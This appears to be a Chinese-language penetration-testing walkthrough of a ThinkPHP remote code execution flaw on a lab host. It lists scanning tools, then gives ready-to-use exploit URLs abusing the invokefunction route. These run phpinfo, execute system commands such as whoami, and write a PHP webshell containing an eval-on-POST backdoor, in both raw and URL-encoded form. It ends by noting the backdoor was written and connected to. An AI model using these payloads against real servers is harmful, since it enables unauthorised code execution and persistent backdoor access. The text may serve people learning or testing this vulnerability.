nuclei✅
nuclei -tags thinkphp -u http://192.168.229.140:8080/
xray✅
thinkphp_scan✅
项目地址:https://github.com/anx0ing/thinkphp_scan
ThinkphpRCE✅
项目地址:https://github.com/sukabuliet/ThinkphpRCE
蓝鲸✅
项目地址:https://github.com/bewhale/thinkphp_gui_tools
莲花✅
项目地址:https://github.com/Lotus6/ThinkphpGUI
尝试命令执行,未得到结果
Thinkphp全网GUI圈子社区专版✅
漏洞验证 & 利用
直接访问如下地址,即可执行phpinfo:
http://192.168.229.140:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
任意代码执行
http://192.168.229.140:8080/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
写入webshell
http://192.168.229.140:8080/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=加你要写入的文件内容url编码
<?php phpinfo(); eval(@$_POST['cmd']); ?>得到:
http://192.168.229.140:8080/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=%3C%3Fphp%20phpinfo()%3B%20eval(%40%24_POST%5B’cmd’%5D)%3B%20%3F%3E
访问一下后门地址,看起来写进去了
连接后门